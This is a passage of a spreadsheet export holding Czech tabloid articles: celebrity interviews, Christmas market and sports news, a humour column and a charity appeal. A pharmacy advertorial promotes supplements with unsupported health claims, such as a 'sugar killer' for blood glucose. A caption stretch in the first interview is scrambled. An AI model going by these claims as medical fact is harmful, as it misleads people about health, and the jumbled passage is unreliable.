hlavně tak, abychom nenabourali.“ To se vám podařilo. „Naštěstí. Jednou nám ulítlo kolo, ale dalo se zastavit. Nebyla to naše vina, prostě únava materiálu, to se stane.“ TŘICET LET ČERTEM Vy ale naštěstí unavený nejste. Máte za sebou premiéru v Divadle Viola, komedii Zločin lorda Artura Savila. A máte tam rovnou několik rolí. „To je pravda. Jsem tam jako vypravěč, chiromant Podgers, dva číšníci, jeden Němec a strážník.“ Je těžké ty role od sebe oddělit? „Ani ne. Je to vždycky na domluvě s režisérem, jak inscenaci chce, či nechce stylizovat. Tady to ani moc nebylo potřeba. Jde o hořkou detektivní komedii Oscara Wilda a je postavená hlavně na textu. Musíte dobře vyslovovat, to nás paní režisérka Lída Engelová velmi hlídala, říct to správně a nic nevynechat. Je až neuvěřitelné, jak je ten text i dnes aktuální.“ S Violou je spojená i vaše slavná role čerta, kterého jste hrál řadu let, že? „Šlo o pohádku Čert to nemá nikdy lehké, a když se v roce 1989 děly všechny listopadové události, tak jsme ji zkoušeli. Takže to byla taková revoluční pohádka, kterou jsme pak hráli skoro třicet let a skončili jsme před covidem. Jezdili jsme s ní po celé republice. Marek Eben nám do ní napsal muziku, dokonce jsme ji natočili do rozhlasu. Ti to vydali na desce, takže děti písničky znaly a zpívaly si je s námi.“ Kdo tam s vámi hrál? „Honza Čenský a pak se vystřídaly holky Simona Stašová a Jarka Kretschmerová, které toho pak nechaly, poté to chvíli hrála Gábina Osvaldová a potom jsme to nacpali mojí první ženě Zuzaně Mixové , která to hrála nejdéle.“ Jaké to bylo být třicet let čertem? „Skvělé. Já hrál starýho čerta, tak u mě to nevadilo, já do něj dozrál. Ale Honza dělal čerta maturanta. Když jsme to hráli naposledy, říkal: Už jsem na to starej, šedivej a já na to: Ty víš, kdy čerti maturují? Vždyť je to úplně jedno!“ (směje se) Následu ho vnouč Otakar Brousek ml. je sobný táta, ale i dědeče dřej (43) ho v povolání ná jdou zatím jinou cestou. N maminkou je Adéla Gondíko cet. „Hrála s ochotníky, a d by k herectví tíhla, tak to ne má Ondra Haničku, ta je za a ještě se neprojevuje. Pa tomu je dvanáct, ten k tom ale uvidíme. Míchá se s hudbou.“ Maminkou je druhá Ondřejova želka Anna Rem vá (44). jí ata? nejen trojnák. Jeho syn Onsleduje, vnoučata ejstarší Nela, jejíž vá (51), má už dvaocela dobře. Ale že ,“ říká Otakar . „Pak tím malá, má sedm k je tu František, u malinko tíhne, to u nich ještě mladších dětí man- Jak vznikl Ťulda? Kolegové mu neřeknou jinak než Ťulda. Známou přezdívku má už od dětství. „Byl jsem asi tříletý chlapeček a skoro jsem nemluvil. Jednou jsem byl s babičkou nakupovat, stáli jsme ve frontě a paní za mnou se zeptala: Co jsi, chlapeček, nebo holčička? Já jsem se prý zamračil a řekl: Ťulda,“ líčí herec. „Pak jsme s tátou přemýšleli, jak jsem k tomu došel. A je pravda, že babička Brousková mi říkala Oťulko, což je blízko. Taky jsem hrozně rád poslouchal Spejbla a Hurvínka a tam je taťulda. Nějak jsem to zkrátil a vznikl Ťulda. Díky tomu mám 17. července svátek. Ale v psím kalendáři,“ směje se. Adolescentní léta a jeden z prvních slušivých klobouků. Se synem Ondřejem, hercem a muzikantem. S kámošem Gondíkem při rallye. Ťulda v klobouku potahuje z cigaretky ve hře Vína popít lok. 1995 S tátou na chalupě při zahradnickém dovádění. Vína popít lok a Dalibor Gondík . ...a škádlení kytary v mladistvém věku. Tři Brousci na divadle. Kdopak asi je ten mal Poslech elpíček... Foto Aha! – Petr Novotný , ČTK /Tomáš Pánek, Viktor Kronbauer , Adam Baranowski a archív Otakara Brouska ml. 1977 Hop a je tu lidoop. Romeo a Julie. Čert s Janem Čenským a Zuzanou . S druhou ženou Helenou. 2024 Zločin lorda Artura Savila ve Viole. Jan Přeučil se také zamiloval do klobouků. ý brouček? Autor: Monika BRABCOVÁ Autor Monika Brabcová Rubrika transition_slide ROZHOVOR</t>
  </si>
  <si>
    <t>114000</t>
  </si>
  <si>
    <t>20241201_296_3474345843_e37a417b1d830684ce16.html</t>
  </si>
  <si>
    <t>e37a417b1d830684ce16</t>
  </si>
  <si>
    <t>ZAOSTŘENO NA ZDRAVÍ A POHODU</t>
  </si>
  <si>
    <t>ZAOSTŘENO NA ZDRAVÍ A POHODU RYCHLÁ ÚLEVA při zažívacích potížích! Trápí vás nadýmání, plynatost, pocit plnosti, těžký žaludek nebo pocit nevolnosti? Pak právě pro vás je v lékárnách k dostání novinka, která zklidní váš zažívací trakt a podpoří trávení. Vsaďte na doplněk stravy GastroMed®, který obsahuje unikátní GastroActive komplex pro správnou činnost zažívacího systému. Díky kombinaci 8 tradičních bylin, mimo jiné kmínu, máty peprné a anýzu, tak podpoří vaše trávení, zklidní pohyby střev a zažívání bez těžkého žaludku. Přípravek je navíc vhodný pro diabetiky a také těhotné a kojící ženy. NOVINKA Konopí a kofein zastaví VYPADÁVÁNÍ VAŠICH VLASŮ Trápí vás chomáče vlasů na kartáči po každém česání? Pak nasaďte proti zvýšenému vypadávání vlasů účinnou kombinaci konopí a kofeinu. Jedinečný Capillus šampon s kofeinem obsahuje nejen vysoký podíl kofeinu stimulující vlasové kořínky a konopný olej vyživující vlasovou pokožku, ale také kopřivu pro lesk vlasů. Při dlouhodobém používání zlepšuje vzhled a kondici vlasů a omezuje jejich nadměrné vypadávání. Při intenzivním vypadávání a řídnutí vlasů je vhodné šampon doplnit koncentrovaným bezoplachovým sérem Capillus s kofeinem pro ještě rychlejší a výraznější účinek. Capillus šampony z řady Cannaderm jsou k dostání v lékárnách a zdravých výživách. CHRAŇTE SVŮJ ZRAK silou borůvek Podrážděné, unavené a citlivé oči umí potrápit každého z nás. Nenechte si proto pokazit váš běžný den a pořiďte si kvalitní oční kapky s extraktem z borůvek, které budou váš zrak doslova hýčkat. Proti svědění, slzení, řezání nebo pálení očí jsou nyní v lékárnách k dostání OCUTEIN SENSITIVE PLUS oční kapky, které mírní podráždění způsobené vnějšími vlivy a zklidňují suché a unavené oči. V jejich složení naleznete hyaluronát sodný zajišťující lubrikační a hydratační účinek a extrakt z borůvek, který pomáhá ulevit od pocitu unavených očí a přispívá k udržení dobrého zraku. Díky šetrnému složení je tento zdravotnický prostředek určen i pro velmi citlivé oči. Oční kapky je možné aplikovat přímo na kontaktní čočky. DVOJÍ SÍLA při brnění a ztuhlosti končetin! Když jen béčka nestačí… Brnění, ztuhlost, necitlivost končetin? Osvědčené vitaminy B vždy nestačí. Nepodceňujte příznaky, kterými o sobě dává vědět rezivějící nervová soustava. Rozhýbejte nervy dvojí silou vitaminů B s resveratrolem! Nervovou soustavu ovlivňuje věk, fyzická zátěž, stres, toxiny, ale i užívání alkoholu či některých tablet. Nenechte nervy rezivět. Nový doplněk stravy Neuromedic Regen rozhýbe nervy dvojí silou. Vysoké dávky vitaminů B zajišťují správnou funkci nervů, komunikaci mezi nervovými buňkami a synergicky působí s resveratrolem z vinné révy, která chrání nervy při jejich nedostatečné výživě, mechanické zátěži, vystavení toxinům, stresu i opotřebení vlivem věku. Žádejte v lékárnách! INKONTINENCE? Stop studu! Nechtěný únik moči je problémem mnoha zralých žen. Kvůli inkontinenci se ženy často vzdávají svých koníčků, zážitků a někdy i sexu. To však není nutné! Dokonce až čtvrtina žen se s inkontinencí potýká ve věku od 40 do 65 let. Právě proto byl pro ženy v menopauze i po ní vyvinut nehormonální doplněk stravy IVE InkontinStop. Ten obsahuje EFLA – extrakt ze semen tykve obecné, který napomáhá udržet standardní počet návštěv WC a pozitivně působí na močový měchýř. Zároveň také napomáhá omezovat únik moči a nutkavou potřebu častého močení. K dostání v lékárnách. První HOT DRINK pro těhotné a kojící maminky Mrazivé zimní dny testují naši imunitu na maximum. Jak se bránit náporu virů a bacilů? Sázkou na jistotu je osvědčený HOT DRINK z lékárny. Pokud toužíte prohřát své tělo, uvolnit ucpaný nos a zbavit se zahlenění, vyzkoušejte doplněk stravy HERBALMED® Hot drink Dr. Weiss. Ten je díky kombinaci 20 šetrných a účinných rostlinných extraktů vhodný také pro těhotné a kojící ženy a děti od 3 let. Pro uvolnění dýchacích cest a podporu imunity vsaďte na hot drink s obsahem eukalyptu, lípy a mateřídoušky. Pro snadnější vykašlávání a normální funkci průdušek dejte přednost horkému nápoji s obsahem jitrocele, tymiánu a dalších bylinek. Hot drinky lze navíc užívat společně s antibiotiky a léky s obsahem paracetamolu a ibuprofenu. Pro ještě rychlejší nástup účinku a potlačení únavy vyzkoušejte doplněk stravy HERBALMED® Hot drink FORTE v sáčcích. ZABIJÁK CUKRU! NOVÝ A SILNĚJŠÍ * *Silnější a účinnější složení oproti DIAMizin Gurmar. Nedostatek inzulinu v těle bývá nejčastěji zapříčiněn obezitou a nezdravým životním stylem. Na vině však často bývají i genetické predispozice. Pokud i vy potřebujete vyrovnat kolísající hladinu cukru v krvi, vsaďte na novinku z lékárny, kterou už nedáte z ruky. Zvažte své možnosti! Za nás je skvělou volbou DIAMizin® Forte – nový a silnější zabiják cukru. Jedná se o ověřený doplněk stravy s posíleným složením o morušovník, chrom, vitaminy B6, B12 a B9 stabilizující hladinu cukru v krvi a omezující chuť na sladké. Přípravek obsahuje také extrakt z rostliny Gymnema sylvestre známé také jako Gurmar. Její účinné látky, kyseliny gymnemové, přispívají k optimální hladině glukózy v krvi a snižují chuť na sladkosti. Napomáhají tak redukci váhy. KONEC ZAD, SVALŮ A KLOUBŮ Čtěte pečlivě informace, které se vztahují k bezpečnému používání zdravotnického prostředku. Bolesti pohybového aparátu mají snadné a efektivní řešení. Konopné mazání Thermolka je totiž dostupné i ve formě náplastí. Hřejivé náplasti intenzivně prohřejí a rychle uleví od bolesti, ztuhlosti i přetížení pohybového aparátu. Zdravotnický prostředek Cannaderm thermolka HŘEJIVÁ NÁPLAST NEW vyniká vysokou účinností při řešení bolesti a ztuhlosti svalů a zad i komfortním způsobem použití. Náplasti jsou ideální pro úlevu od přetížení pohybového aparátu v klidovém režimu. Silný hřejivý efekt náplasti intenzivně prohřívá a omezuje bolestivost postiženého místa. Díky inovované hydrogelové formě náplasti lépe přilnou k pokožce, ale je možné je také snadno odstranit bez nepříjemného podráždění pokožky a trhání chloupků. Konopné náplasti i mazání značky Thermolka jsou k dostání v lékárnách a zdravých výživách. Rychlá úleva pro suché, podrážděné a velmi citlivé oči. Čtěte pečlivě návod k použití a informace, které se vztahují k bezpečnému používání zdravotnického prostředku.</t>
  </si>
  <si>
    <t>20241201_297_3474332024_127279047e3e5ab29c65.html</t>
  </si>
  <si>
    <t>127279047e3e5ab29c65</t>
  </si>
  <si>
    <t>Staromák se rozsvítil Za tónů Vltavy...</t>
  </si>
  <si>
    <t>Staromák se rozsvítil Za tónů Vltavy ... Největší vánoční trhy Česka vypukly PRAHA (mv) – V tradičních barvách a bez velké pompy. Na pražském Staromáku včera odstartovaly vánoční trhy. Dvacetimetrový smrk vévodící náměstí rozzářilo všech 110 890 žárovek umístěných na 12kilometrovém řetězu. Byť se otevřely již včera ráno, trhy pomyslně odstartovala v 16:30 premiéra animace stromu za tónů Smetanovy skladby Vltava z cyklu Má vlast. Kdo ji prošvihl, ale nemusí litovat. „Hosté ji mohou vidět každý den vždy v půl od 16.30 do 21.30 hodin,“ řekla mluvčí trhů Hana Tietze z firmy Taiko . Letošní trhy, které americká televize CNN označila za třetí nejkrásnější na světě, se nesou v duchu českých tradic a obešly se bez kýčovitých světelných efektů. „Strom jsme ozdobili více než dvanácti kilometry teple bílého osvětlení s teple bílými motivy – zimními vločkami – a rozsvítilo se na něm 110 890 LED diodových žárovek,“ popsala Eva Poláčková ze společnosti Decoled . Strom zdobí 50 sněhových vloček a 340 koulí ze skla. Trhy jsou pak otevřeny každý den od 10 do 22 hodin. Tradice především 82 stánků vyzdobených ve zlaté, stříbrné a červené nabízí především zboží z Česka . Nechybí tradiční vánoční ozdoby, výtvory uměleckého kováře nebo dřevěné hračky. Mlsné jazýčky potěší nejen klobásy, perníčky a palačinky, ale i bramborový salát s kaviárem. Zahřát se můžete svařeným vínem , které je letos výhradně z moravských hroznů, punčem nebo medovinou. Víte, že... ...ceny vzrostly oproti loňsku jen o cca pět procent? Svařák zdražil o desetikorunu na 100 Kč za dvě deci, klobása stojí stejně, 150 Kč. Slavnostnímu rozsvícení přihlížely tisíce lidí. Na 12kilometrovém řetězu září přes 110 tisíc světýlek. Foto Aha! – D. Malík Vánoční trhy, svařák, groček, něco malého k jídlu, tomu málokdo odolá.</t>
  </si>
  <si>
    <t>20241201_298_3475682329_af53ce36aca2c33da0f2.html</t>
  </si>
  <si>
    <t>af53ce36aca2c33da0f2</t>
  </si>
  <si>
    <t>Ušetřili za pivo</t>
  </si>
  <si>
    <t>Ušetřili za pivo Baník udolal Karvinou OSTRAVA (nem) – Slezskou řež opanovala Ostrava , když otočila derby s Karvinou na 2:1. K tuplované radosti fans Baníku . Jeho vedení totiž slíbilo, že jim za každý gól týmu kouče Hapala sníží cenu piva o tři kačky. Začalo se na 52 a skončilo na 46 korunách. Byla to řež. Foto Blesk – Aleš Krecl</t>
  </si>
  <si>
    <t>427000</t>
  </si>
  <si>
    <t>20241201_299_3475642619_fa1729562af3d37d5278.html</t>
  </si>
  <si>
    <t>fa1729562af3d37d5278</t>
  </si>
  <si>
    <t>MÁM DOMLUVU S VESMÍREM!</t>
  </si>
  <si>
    <t>MÁM DOMLUVU S VESMÍREM! Rubrika: ROZHOVOR Herečka Kristína Svarinská: „Je to jednodušší než mít obavy a stále řešit, co by se mohlo stát.“ Kristínu Svarinskou (35) známe z filmů Srdce na dlani, Lítá v tom nebo 10 pravidel, jak sbalit holku. Před třinácti lety natočila romantické drama Love, které se stalo třetím historicky nejúspěšnějším filmem na Slovensku . 7. listopadu vtrhlo do kin pokračování. S kým jiným si tedy popovídat o lásce než s ní. Jste zamilovaná? „Ano a jsem šťastná.“ Co je pro vás láska? „Láska je esencí žití, dělá mě živou. Považuji ji za nejdůležitější emoci. Nemusí být jenom partnerská, ale i rodičovská, sourozenecká, láska k životu, k práci, k sobě.“ Máte se ráda? „Určitě. Intenzivně pracuji na tom, abych měla pěkný vztah sama se sebou a abych dělala jen to, co opravdu dělat chci.“ S možností dělat, co chcete, souvisí i finance. V Česku se říká »love« penězům. Jaký k nim máte vztah? „Myslím si, že pozitivní. Nebudeme si nic namlouvat, ulehčují a zjednodušují život. Ale nefixuju se na ně, ráda je zase pouštím do oběhu. Není důvod cpát je do polštáře, protože tam se nerozmnoží.“ Když si chcete udělat radost, za co je nejradši utrácíte? „Za jídlo a cestování. Jsem takový gastro turista. Ráda cestuji za jídlem. Když jsem na výletě, chodím po kavárnách a dobrých restauracích. Prohlédnu si, jaká je nabídka v místě, a vyberu si, co mě zaujme. Nemusí to být nutně restaurace drahá, ale dobrá.“ Do světa často vyrážíte i sama. Proč cestujete takhle sólo? „Když jsem jednou chtěla někam vycestovat, měla jsem volný jenom jeden termín, ve kterém ale nikdo jiný neměl čas. Tak jsem si řekla, že pojedu sama. To bylo poprvé. Přišla jsem na to, že dokážu se sebou být a nevadí mi to. Bylo to pro mě velmi podnětné a řekla jsem si, že to bude můj čas. Od té doby cestuji po světě sama. Třeba jsem takhle letěla na španělský ostrov Tenerife , do Thajska v Asii nebo třeba na Srí Lanku , nacházející se na stejném kontinentu.“ Nechybí vám někdo, s kým se můžete o zážitky podělit? „Ne. Hodně lidí si myslí, že cestování je o nějakém sdílení. Sdílení ale někdy zážitek utlumí. Když jsem sama, často nemám ani potřebu nějaký okamžik fotit nebo nahrávat na video. Někdy jen tak pozoruji a stačí mi to.“ A co když na cestách onemocníte a jste sama? Kdo vám pomůže? „Tím se vůbec nezaobírám. Nepřemýšlím nad tím, co zlého by se mohlo stát. Častokrát jsem na výlety chodila i bez léků. Nechci si špatné věci přivolávat tím, že na ně budu myslet.“ Aha. Nikdy jste se nedostala do situace, kdy jste se o sebe bála? „Ne, mám to s vesmírem nastavené tak, že se věci budou dít podle toho, jak chci, a ony se tak dějí. Přijde mi to jednodušší než mít obavy. Pak bych stále řešila, co by se mohlo stát, a neužila bych si přítomnost.“ Máte ráda adrenalin? „Nevyhledávám ho. Nejsem typ na adrenalinové sporty, nepotřebuji skákat bungee jumping. Ale někdy mám pocit, že adrenalin se skrývá i v méně nápadných aktivitách, a tomu se nevyhneme. Například při nákupu v obchodě nebo za volantem.“ Máte ráda řízení? „Ano, miluji ho. Jezdím ráda, rychle, ale bezpečně.“ Co vás za volantem rozčiluje? „Vadí mi řidiči, kteří úmyslně nebo z neznalosti omezují ostatní. Třeba absolutně nerozumím těm, kteří jezdí na dálnici vlevo a pomalu, přestože se mohou zařadit do pravého pruhu.“ Děti nejdříve bezmezně milují své rodiče. Když je pomineme, ke komu nebo čemu jste poprvé pocítila lásku? „Asi k našemu psovi, ale když o tom tak přemýšlím, možná jsem byla ještě dříve zamilovaná do tance. Chodila jsem tancovat a moc jsem se na to v šesti letech těšila.“ Pokračujte na straně 36 Lásku k tanci jste mohla využít v roce 2022, když jste tančila v Let‘s Dance, tedy slovenské obdobě StarDance. „No, to byl trochu jiný než láskyplný příběh, protože v této soutěži jsem se musela za velmi krátký čas naučit to, co jsem do té doby v životě nedělala. Společenské tance mají jiná pravidla a funguje to na principech sportovního výkonu. To byl jeden problém.“ A ten druhý? „Nikdy předtím jsem netancovala v páru.“ Jak to? „Dříve jsem vždy dělala tance, u nichž jsem nepotřebovala nikoho jiného. A najednou jsem musela souznít s partnerem, který vás vede, se kterým musíte fungovat a vytvářet celek. Pro mě to byla úžasná zkušenost, ale velmi stresující. Jsem herečka, mám zkušenost s vystupováním před lidmi, ale tady jsem byla sama za sebe. Je to jiné, než když hrajete nějakou roli. Člověk chce podat co nejlepší výkon a ví, že to nebude stoprocentní. Myslím, že jsme skončili pátí nebo šestí.“ Byla jste ráda, že už je konec? „Ano. A nebylo to pro mne žádné překvapení. Ten den jsem se ráno probudila s pocitem, že odtancuji svůj poslední večer.“ Páry ze StarDance vždycky říkají, že po skončení soutěže se budou tanci věnovat dál. Taky jste to tak měla? „Ano. Jeden trénink jsem dokonce absolvovala, ale potom už jsme se neviděli. Mám ovšem kamarádky, které účinkovaly v dalších sériích a tancují dodnes.“ Občas ale tancujete, ne? „Občas ano, ale jen nějaké nechoreografické tance.“ Tam, kde se tančí, se i popíjí. Alkohol ale příliš v lásce nemáte. Komplikuje vám někdy abstinence společenský život? „Mně se žije bez alkoholu ve společnosti velmi dobře. To, jak se žije společnosti se mnou, je její problém. Všichni už si myslím zvykli, že nepiji. Nicméně oblíbená vlastnost Slováků je nutit lidi do konzumace alkoholu . A říkají věty typu: »Jenom jednu. To ti nic neudělá. Dej si aspoň víno .« Jako kdyby víno ani nebyl alkohol . Na začátku se mě všichni ptali, proč nepiju, proto jsem se jich začala ptát: Proč ty piješ? Pití alkoholu je slovenský sport a myslím, že je načase říct, že je normální i nepít.“ Máte dva sourozence. Věkový rozdíl mezi vámi a bratrem Michalem je 13 let a sestrou Petrou 14 roků. Jak se u vás projevovala sourozenecká láska, když byli o tolik starší? „Byli to mé velké vzory. Velmi jsem k nim vzhlížela a s přibývajícím věkem se náš vztah přetransformoval ze starší sestry a staršího bratra na rovnocenné partnery. Vždy jsem se pohybovala ve společnosti starších lidí, ale už se to začíná pomalu otáčet a nebývám v kolektivu ta nejmladší. Hraji i s kolegyněmi o deset let mladšími a vnímám je jako mladší sestry.“ Jak to snášíte, že už nejste nejmladší? „Dobře. Děje se to úplně přirozeně.“ Milujete své povolání? „Ano, ale dokážu si představit, že bych dělala i něco jiného. Necítím, že bych herectví měla dělat celý život. Možná to jednou budu mít jako druhé povolání.“ A co by bylo to první? „Třeba bych si otevřela kavárnu někde v Thajsku na pláži, ale to je daleko, tak na Tenerife nebo v Řecku .“ Jste na Slovensku populárnější než v Česku? „Vzhledem k tomu, že většinou působím na Slovensku , cítím se více doma tam, lidé mě tam více poznávají. Aktuálně působím v seriálu Dunaj , k vašim službám, který je velmi oblíbený. Vychází z vašeho námětu Zlatá labuť, ale pak si to začalo žít vlastním životem. U vás se už nenatáčí, ale my pokračujeme intenzivně dál.“ U nás vznikly tři série... „My točíme devátou. Hraji hlavní ženskou postavu.“ V české verzi ji hrála Marta Dancingerová . Baví vás to? „Baví. Nikdy jsem nebyla tak dlouho v jednom projektu. V podstatě točíme druhý rok. Na začátku to bylo intenzivnější. Začalo to vznikem slovenského státu a už jsme v roce 1942.“ Líbí se vám ta doba? „Bavily mě na začátku dobové kostýmy. Potom jsem měla fázi, kdy mi to lezlo na nervy. Samé šaty a sukně a už jsem z toho začínala být nervózní. Každopádně žít za druhé světové války by se mi určitě nelíbilo.“ V kinech vás od 7. listopadu můžeme vidět v akčním thrilleru Love 2. V prvním dílu jste měla i erotickou scénu. Máte tyto scény v lásce? „Je to součást mé profese. Tak jako zubař jde vrtat zuby, my máme tohle. Zobrazujeme život se všemi jeho aspekty. V kontextu děje mi nahohota přišla naprosto přirozená. Dva lidi, kteří se milují, neřeší, jestli budou oblečení, nebo nazí. Natáčení Love byl pro mě start do nové kariéry. Vnímala jsem to jako školní projekt a nenapadlo mě, že to bude mít takový úspěch, a vůbec bych si nemyslela, že po 13 letech tady budeme prezentovat volné pokračování.“ Co byste si do budoucna přála? „Chtěla bych mít prostor dělat to, co mě baví. Mít zajímavé pracovní příležitosti, cestovat a mít hluboký partnerský vztah. A vytvářet hodnotná přátelství.“ Nejnověji ji můžeme vidět ve snímku Love2, který je na Slovensku aktuálně pátým nejnavštěvovanějším filmem. V komedii Srdce na dlani (2022) se potkala i s Vladimírem Polívkou . Někdy je potřeba mít kliku. A to i v hořké komedii Teroristka (2019). Se Zdeňkem Piškulou v pohádce Nejlepší přítel (2017). S Taťjanou Medveckou a Kryštofem Hádkem v romantické komedii Lítá v tom (2023). V Let´s Dance (2022) tančila s profesionálem Markem Kličem. VOLHA , OSADA... „Ve svých jedenácti letech jsem se chodila učit tancovat na základní uměleckou školu. Jednoho dne přišli na návštěvu do hodiny filmaři, kteří hledali dětské herce pro film Dážď padá na naše duše, a já jsem je zřejmě zaujala svoji spontánností,“ říká Kristína . V osmnácti letech začala natáčet seriál Panelák a tam si uvědomila, že ji ta profese baví. V Česku na sebe upoutala pozornost v seriálech Volha , Revír nebo Osada. CESTOVATELSKÝ SEN „Mám jich hodně. Třeba Amsterdam , Jižní Ameriku a Japonsko . Potom se ráda vracím na místa, kde jsem byla,“ říká herečka a ihned vysvětluje: „Chci znovu zažít to pěkné, co jsem tam prožila. Navíc nikdy to není úplně stejné, vždy tam přijíždíte v jiném životním období, v jiném rozpoložení, s jinou energií.“ Autor: Text: Jindřich Bíč Foto: Continental film, archiv Autor Jindřich Bič Rubrika transition_slide ROZHOVOR</t>
  </si>
  <si>
    <t>20241201_3_3482293688_7ae0fdd2e7b0d21cd946.html</t>
  </si>
  <si>
    <t>7ae0fdd2e7b0d21cd946</t>
  </si>
  <si>
    <t>Po havárii u Rájce-Jestřebí skončilo osobní auto mimo silnici na střeše</t>
  </si>
  <si>
    <t>Po havárii u Rájce -Jestřebí skončilo osobní auto mimo silnici na střeše Zápotocká Jana 2. 12. 2024 0 Hned tři dopravní nehody řešili policisté v sobotu na Prostějovsku. Dvě z nich si vyžádaly zranění, u dvou nehod byl také na místě alkohol . K první nehodě došlo na ulici Brněnská v Prostějově, řidiči před vozidlo vběhla z cyklostezky žena v černém. K nehodě došlo po čtvrté hodině ranní. „Řidič jel po uvedené ulici směrem z centra, když mu náhle, přímo před vozidlo, vběhla z cyklostezky žena ve středních letech oblečená v černém,“ uvedla… Karel Janovský 1. 12. 2024 0 Britský odborník na UFO a filmař Mark Christopher Lee tvrdí, že snímky záhadné koule na letišti v Manchesteru jsou nevyvratitelným důkazem existence UFO. Lee se […] Karel Janovský 2. 12. 2024 0 JIHLAVA – Na Masarykově náměstí v Jihlavě se v neděli 1. prosince v 16:45 hodin rozsvítil vánoční strom. Spolu s ním se ve městě rozzářila i vánoční výzdoba a […] Článek FOTO, VIDEO: Jihlava rozsvítila vánoční strom. Rozjela se kluziště, do ulic vyrazil vánoční trolejbus se nejdříve objevil na Novinykraje.cz. Vaše zpětné odkazy Zobrazení počtu sledujících na Facebook stránce Deník Pravda Sdílet obsah je povoleno s uvedením odkazu.Nabízíme reklamní bannery, odkazy, PR a SEO články. Ceník naleznete zde: (klik) Autor: Karel Janovský Autor person Karel Janovský</t>
  </si>
  <si>
    <t>20241201_30_3478890771_3f2534e0ce73219e9dd7.html</t>
  </si>
  <si>
    <t>3f2534e0ce73219e9dd7</t>
  </si>
  <si>
    <t>Jak se z běžného chlapa stane mistr improvizace v jedné osamělé večerní seanci piva</t>
  </si>
  <si>
    <t>Jak se z běžného chlapa stane mistr improvizace v jedné osamělé večerní seanci piva autor: Redakce Nezdrave.cz | 01.12.2024 | Kecy Život je jako zlatý hřebík, co pokřikujete na zakrváceném výstavišti i s lahvovým pivem v ruce. Všichni víme, že pravé umění leží mezi játry a žaludkem, a dnes vám v tomto honosném komentáři přináším příběh jednoho průměrného kluka, který se dostal do situace, jež by mohla rozesmát i kamenného muže. Mluvit dnes budeme o improvizaci a umění přetvořit nepřízeň osudu na špičkovou zábavu bez jakékoli cenzury. A víte co? Ta debilní náhoda se někdy změní v mistrovské dílo. Od piva k geniálnímu nápadu Jednoho podvečera se Pepa, náš hrdina, vracel domů z polední kalby. Bylo mu jasné, že čelí kruté pravdě: bez piva se mu nedostane inspirace k tomu, aby večer strávil smysluplně. Zanedlouho se ve své kuchyni ocitl s udrženým pivem v jedné ruce a mírně prohnilým hermelínem v druhé. Úplně ho totiž opustila snaha o zdravou výživu, a kdo by se s tím zabýval, když je doslova na pokraji propasti? A tak dnes večer se Pepa rozhodl, že místo plné ledničky jako jiní, vytlačí své myšlenky přímo za studený krém na sušenky. Nápad mu učaroval do té míry, že se rozhodl vystoupit z komfortní zóny a naplnit večerní chvilky tak, jak to dělají lidé se stylem. Hrozí vám teď otázka, co se stalo dál? Zrovna když se do hermelínu vorala zasněná myšlenka, osvítilo ho. Vždyť není nic jednoduššího než vystavit se umění improvizace a trénovat své scenáristické nadání přímo v kuchyni! Jako moudrý moudrý muž říká: „Život je pouze improvizací – je na tobě, jakou roli si vybereš.“ Ten večer, s pivem po ruce, Pepa napsal scénář k novému životu, v němž hrál hlavní roli absurdního hrdiny. Nepředvídatelnost života Je až fascinující, jak se jeden impulz může proměnit v celou smršť překvapení. Melodie starých kapel z rádia šířila v jeho bytě tu pravou atmosféru jako příjemné houby po dešti. Pepa se rozhodl zahrát si na režiséra, přičemž hermelín mu kontrastoval jako herecký partner, který nemá co ztratit. Rozhodl se zprostředkovat vtipnou scénu, v níž se pokusil naučit hermelín mluvit, a to vedlo k situacím, které by mohly inspirovat i Tarantina. Na konci „představení” Pepa zjistil, že žít to, co mu srdce velí – improvizace, humor a kapka absurdity – mu dodává pocit štěstí. Jeho úpolné snažení z smradlavého sýra se přetavilo v zážitek, který už nikdy nezapomene. Vzpomínky na tenhle bizarní večer v něm zanechaly stopy, které mu později v životě ukázaly, co oznámil hrdě zcela jasně a s grácií: „Humor je klíčem ve dveřích do neznámého.” Když se Pepa s přáteli později setkal u piva , podělil se o historku o své improvizaci s hermelínem. Kamarádi se smáli tak, že se málem dusili. Občas si kladli otázku, zda je Pepa víc umělec nebo prostě dement, avšak přesně to je krása světa. O to jde. Tomu se říká „žít naplno”. A tak, drahé duše, pamatujte, že životní improvizace je na prvním místě, a přesto není ani zdaleka tak složitá, jak bychom se mohli domnívat. Nejnovější příspěvky Autor: Redakce Nezdrave.cz Rubrika transition_slide Kecy</t>
  </si>
  <si>
    <t>20241201_300_3475640140_14990bbcd64d29b209e4.html</t>
  </si>
  <si>
    <t>14990bbcd64d29b209e4</t>
  </si>
  <si>
    <t>Zázrak BLESKU: POMŮŽETE I VY?</t>
  </si>
  <si>
    <t>Zázrak BLESKU: POMŮŽETE I VY? Rubrika: TÉMA ČR (red) – Projekt Zázrak Blesku si dal za cíl vybrat peníze, a pomoci tím konkrétním lidem, kteří to potřebují. Starají se o své blízké či o vážně nemocné děti a finančně vše zvládat sami nedokážou. Vybrali si proto vždy konkrétní věc či službu, která by jim jejich boj s osudem ulehčila. Tady jsou první 3 z 6 letošních příběhů... Marie (62) se schizofrenií VYBÍRÁME 105 TISÍC Bez asistence by neměla pevný režim a propukly by u ní obří halucinace. Marie Novotná z Nelahozevsi na Mělnicku trpí schizofrenií. S nemocí bojuje Marie od studií, nikdy nechodila do práce ani neměla vztah. „Nepoznala, co je to, aby ji někdo miloval jako ženu,“ upozorňuje sociální pracovnice Klára Palichová (54) na to, že po smrti rodičů zůstala sama. „Má jen bratra, který se v rámci možností snaží o ni starat, ale asistentka je ta, která jí pomáhá s tím klasickým nastavením režimu pro ženu,“ myslí si sociální pracovnice. A jak se u ní schizofrenie projevuje? Má několik realit, ve kterých žije. Je přesvědčena o věcech, které neexistují. Aby paní Marie nemusela do ústavu, potřebuje každý den péči sociálních pracovnic, které jí pomáhají nastavit pevný denní režim. Měsíčně je potřebuje 55 hodin. Potřebná částka 105 600 Kč jí zajistí tedy možnost zůstat i v roce 2025 ve vlastním domě s asistencí. Pa vel Soldán (23) po kómatu VYBÍRÁME 115 TISÍC „Mám nejlepšího tátu a je hodnej,“ prohlásil Pavel Soldán z Květnové na Karlovarsku. Ten žil ještě před pár lety normální život. Vyučil se operátorem skladování, udělal si řidičák a nastoupil do práce. V ní si ale první peníze vydělával pouhé dva týdny. „Když se 14. srpna 2020 vracel z odpolední, zřejmě kvůli mikrospánku boural a narazil do stromu. Drogy ani alkohol v tom nebyly. Dlouhých 10 měsíců pak byl v kómatu,“ popsal se slzami v očích tatínek Pavel (66). Aby se pak o syna mohl starat, musel skončit v práci. „Syn má invaliditu 